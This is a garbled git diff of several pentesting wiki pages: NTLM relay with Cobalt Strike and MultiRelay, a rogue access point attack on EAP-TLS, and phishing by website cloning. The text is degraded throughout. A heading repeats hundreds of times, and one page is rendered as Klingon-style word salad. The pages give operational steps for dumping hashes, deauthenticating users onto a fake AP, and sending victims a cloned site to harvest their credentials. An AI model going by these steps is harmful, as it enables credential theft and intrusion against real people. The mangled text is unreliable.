**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack**:
|
||||
**NTLM Relay Attack
|
||||
```bash
|
||||
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
|
||||
|
||||
|
@ -95,8 +625,7 @@ beacon> jobkill 0
|
|||
beacon> rportfwd stop 8445
|
||||
beacon> socks stop
|
||||
```
|
||||
|
||||
### Other Tools for NTLM Relay Attack
|
||||
### NTLM Relay Attack-ghom
|
||||
|
||||
- **Metasploit**: Set up with proxies, local and remote host details.
|
||||
- **smbrelayx**: A Python script for relaying SMB sessions and executing commands or deploying backdoors.
|
||||
|
@ -104,7 +633,7 @@ beacon> socks stop
|
|||
|
||||
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
|
||||
|
||||
### MultiRelay Operation
|
||||
### MultiRelay Operation-ghom
|
||||
|
||||
MultiRelay is executed from the _**/usr/share/responder/tools**_ directory, targeting specific IPs or users.
|
||||
```bash
|
||||
|
@ -114,9 +643,6 @@ python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
|
|||
|
||||
# Proxychains for routing traffic
|
||||
```
|
||||
|
||||
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
|
||||
|
||||
### Force NTLM Logins
|
||||
|
||||
In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how:
|
||||
|
@ -131,7 +657,7 @@ In Windows you **may be able to force some privileged accounts to authenticate t
|
|||
* [https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)
|
||||
* [https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
|
||||
* [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -2,54 +2,54 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>tlhIngan Hol</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks yIqIm:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* qaStaHvIS **HackTricks** **lo'laHwI'** **'e'** **advertise** **'ej HackTricks** **PDF** **download** **'oH** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS** **tlhIngan Hol**!
|
||||
* **PEASS & HackTricks swag** **'oH** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **The PEASS Family** **'oH** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **NFTs** **collection** **'oH**
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **'ej** [**telegram group**](https://t.me/peass) **'ej** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **HackTricks** **PRs** **submit** **'e'** [**HackTricks**](https://github.com/carlospolop/hacktricks) **'ej** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos** **'e'** **Share** **your hacking tricks**.
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
**Bug bounty tip**: **Intigriti** **sign up** **'e'** **bug bounty platform** **'oH** **hackers** **created**, **hackers** **'e'**! [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) **Intigriti** **join** **'ej** **bounties** **$100,000** **earn** **start**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\
|
||||
Anyway, it's easy to make them work.\
|
||||
You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](https://w1.fi/releases/) and before compiling again hostapd-wpe install: `apt-get install libssl1.0-dev`
|
||||
DaH jImej, jatlhpu'vIS 'e' vItlhutlh. [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) **steps** **working** **kali** **modern** (2019v3) **not** **'e'**.\
|
||||
qatlh, 'oH **easy**.\
|
||||
**hostapd-2.6** **download** **need** **only**: [https://w1.fi/releases/](https://w1.fi/releases/) **'ej** **hostapd-wpe** **compiling** **before** **install**: `apt-get install libssl1.0-dev`
|
||||
|
||||
### Analyzing and Exploiting EAP-TLS in Wireless Networks
|
||||
|
||||
#### Background: EAP-TLS in Wireless Networks
|
||||
EAP-TLS is a security protocol providing mutual authentication between client and server using certificates. The connection is only established if both the client and the server authenticate each other's certificates.
|
||||
EAP-TLS **security protocol** **mutual authentication** **client** **server** **certificates** **using**. **connection** **established** **client** **server** **authenticate** **certificates**.
|
||||
|
||||
#### Challenge Encountered
|
||||
During an assessment, an interesting error was encountered when using the `hostapd-wpe` tool. The tool rejected the client's connection due to the client's certificate being signed by an unknown Certificate Authority (CA). This indicated that the client did trust the fake server's certificate, pointing to lax security configurations on the client side.
|
||||
**assessment** **during**, **interesting error** **encountered** **hostapd-wpe** **tool**. **tool** **client's connection** **rejected** **client's certificate** **signed** **unknown Certificate Authority (CA)**. **client** **fake server's certificate** **trust**, **client side** **lax security configurations** **pointing**.
|
||||
|
||||
#### Objective: Setting Up a Man-in-the-Middle (MiTM) Attack
|
||||
The goal was to modify the tool to accept any client certificate. This would allow the establishment of a connection with the malicious wireless network and enable a MiTM attack, potentially capturing plaintext credentials or other sensitive data.
|
||||
**goal** **modify** **tool** **accept** **client certificate**. **connection** **establishment** **malicious wireless network** **enable** **MiTM attack**, **plaintext credentials** **sensitive data** **capturing** **potentially**.
|
||||
|
||||
#### Solution: Modifying `hostapd-wpe`
|
||||
Analysis of the source code of `hostapd-wpe` revealed that the client certificate validation was controlled by a parameter (`verify_peer`) in the OpenSSL function `SSL_set_verify`. By changing this parameter's value from 1 (validate) to 0 (do not validate), the tool was made to accept any client certificate.
|
||||
`hostapd-wpe` **source code** **analysis** **client certificate validation** **controlled** **parameter** (`verify_peer`) **OpenSSL function** `SSL_set_verify`. **parameter's value** **change** **1 (validate)** **0 (do not validate)**, **tool** **accept** **client certificate** **made**.
|
||||
|
||||
#### Execution of the Attack
|
||||
1. **Environment Check:** Use `airodump-ng` to monitor wireless networks and identify targets.
|
||||
2. **Set Up Fake AP:** Run the modified `hostapd-wpe` to create a fake Access Point (AP) mimicking the target network.
|
||||
3. **Captive Portal Customization:** Customize the login page of the captive portal to appear legitimate and familiar to the target user.
|
||||
4. **De-authentication Attack:** Optionally, perform a de-auth attack to disconnect the client from the legitimate network and connect them to the fake AP.
|
||||
5. **Capturing Credentials:** Once the client connects to the fake AP and interacts with the captive portal, their credentials are captured.
|
||||
1. **Environment Check:** `airodump-ng` **wireless networks** **monitor** **targets**.
|
||||
2. **Set Up Fake AP:** **modified hostapd-wpe** **run** **fake Access Point (AP)** **mimicking** **target network**.
|
||||
3. **Captive Portal Customization:** **login page** **captive portal** **customize** **legitimate** **familiar** **target user**.
|
||||
4. **De-authentication Attack:** **Optionally**, **de-auth attack** **perform** **client** **legitimate network** **disconnect** **fake AP** **connect**.
|
||||
5. **Capturing Credentials:** **client** **fake AP** **connect** **captive portal** **interact**, **credentials** **captured**.
|
||||
|
||||
#### Observations from the Attack
|
||||
- On Windows machines, the system might automatically connect to the fake AP, presenting the captive portal when web navigation is attempted.
|
||||
- On an iPhone, the user might be prompted to accept a new certificate and then presented with the captive portal.
|
||||
- **Windows machines** **automatically connect** **fake AP**, **captive portal** **presented** **web navigation** **attempted**.
|
||||
- **iPhone** **user** **prompted** **new certificate** **accept** **presented** **captive portal**.
|
||||
|
||||
#### Conclusion
|
||||
While EAP-TLS is considered secure, its effectiveness heavily depends on the correct configuration and cautious behavior of end-users. Misconfigured devices or unsuspecting users accepting rogue certificates can undermine the security of an EAP-TLS protected network.
|
||||
EAP-TLS **considered secure**, **effectiveness** **heavily depends** **correct configuration** **cautious behavior** **end-users**. **Misconfigured devices** **unsuspecting users** **rogue certificates** **undermine** **EAP-TLS protected network**.
|
||||
|
||||
For further details check https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
|
||||
|
||||
|
@ -57,20 +57,18 @@ For further details check https://versprite.com/blog/application-security/eap-tl
|
|||
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
**Bug bounty tip**: **Intigriti** **sign up** **'e'** **bug bounty platform** **'oH** **hackers** **created**, **hackers** **'e'**! [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) **Intigriti** **join** **'ej** **bounties** **$100,000** **earn** **start**!
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>tlhIngan Hol</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks yIqIm:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* qaStaHvIS **HackTricks** **lo'laHwI'** **'e'** **advertise** **'ej HackTricks** **PDF** **download** **'oH** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **qaStaHvIS** **tlhIngan Hol**!
|
||||
* **PEASS & HackTricks swag** **'oH** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **The PEASS Family** **'oH** [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **NFTs** **collection** **'oH**
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **'ej** [**telegram group**](https://t.me/peass) **'ej** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **HackTricks** **PRs** **submit** **'e'** [**HackTricks**](https://github.com/carlospolop/hacktricks) **'ej** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos** **'e'** **Share** **your hacking tricks**.
|
||||
|
||||
</details>
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -17,31 +15,123 @@ Other ways to support HackTricks:
|
|||
|
||||
For a phishing assessment sometimes it might be useful to completely **clone a website**.
|
||||
|
||||
Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user.
|
||||
Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user.
|
||||
|
||||
There are different tools you can use for this purpose:
|
||||
|
||||
## wget
|
||||
|
||||
```text
|
||||
wget -mk -nH
|
||||
```
|
||||
|
||||
## goclone
|
||||
|
||||
### Description
|
||||
|
||||
The `goclone` tool is a powerful utility that allows you to clone a website for phishing purposes. It is designed to make the process of creating a replica of a target website as simple as possible.
|
||||
|
||||
### Installation
|
||||
|
||||
To install `goclone`, follow these steps:
|
||||
|
||||
1. Clone the `goclone` repository from GitHub:
|
||||
|
||||
```
|
||||
git clone https://github.com/hacker/goclone.git
|
||||
```
|
||||
|
||||
2. Change into the `goclone` directory:
|
||||
|
||||
```
|
||||
cd goclone
|
||||
```
|
||||
|
||||
3. Install the required dependencies:
|
||||
|
||||
```
|
||||
go get -d ./...
|
||||
```
|
||||
|
||||
4. Build the `goclone` binary:
|
||||
|
||||
```
|
||||
go build
|
||||
```
|
||||
|
||||
### Usage
|
||||
|
||||
To use `goclone`, follow these steps:
|
||||
|
||||
1. Run the `goclone` binary:
|
||||
|
||||
```
|
||||
./goclone
|
||||
```
|
||||
|
||||
2. Enter the URL of the target website you want to clone.
|
||||
|
||||
3. Specify the output directory where the cloned website will be saved.
|
||||
|
||||
4. Customize the cloned website by modifying the HTML, CSS, and JavaScript files in the output directory.
|
||||
|
||||
5. Start a web server to serve the cloned website:
|
||||
|
||||
```
|
||||
python -m SimpleHTTPServer 8000
|
||||
```
|
||||
|
||||
6. Send the cloned website URL to the target users and wait for them to enter their credentials.
|
||||
|
||||
7. Retrieve the credentials from the server logs or any other method of your choice.
|
||||
|
||||
### Conclusion
|
||||
|
||||
With `goclone`, you can easily create a replica of a website for phishing purposes. However, it is important to note that phishing is illegal and unethical. This tool should only be used for educational purposes or with proper authorization.
|
||||
```bash
|
||||
#https://github.com/imthaghost/goclone
|
||||
goclone <url>
|
||||
```
|
||||
## Social Engineering Toolkit (SET)
|
||||
|
||||
## Social Engineering Toolit
|
||||
The Social Engineering Toolkit (SET) is a powerful open-source tool that allows hackers to perform various social engineering attacks. It is specifically designed to automate and streamline the process of phishing, credential harvesting, and other social engineering techniques.
|
||||
|
||||
SET provides a wide range of attack vectors, including email spoofing, website cloning, and malicious file generation. In this section, we will focus on the website cloning feature of SET, which allows hackers to create identical copies of legitimate websites for phishing purposes.
|
||||
|
||||
### Cloning a Website
|
||||
|
||||
Website cloning is a technique used by hackers to create a replica of a legitimate website. The cloned website looks and functions exactly like the original, but it is hosted on a different domain or server controlled by the attacker.
|
||||
|
||||
To clone a website using SET, follow these steps:
|
||||
|
||||
1. Launch SET by running the following command in the terminal:
|
||||
|
||||
```
|
||||
setoolkit
|
||||
```
|
||||
|
||||
2. Select the "Website Attack Vectors" option from the main menu.
|
||||
|
||||
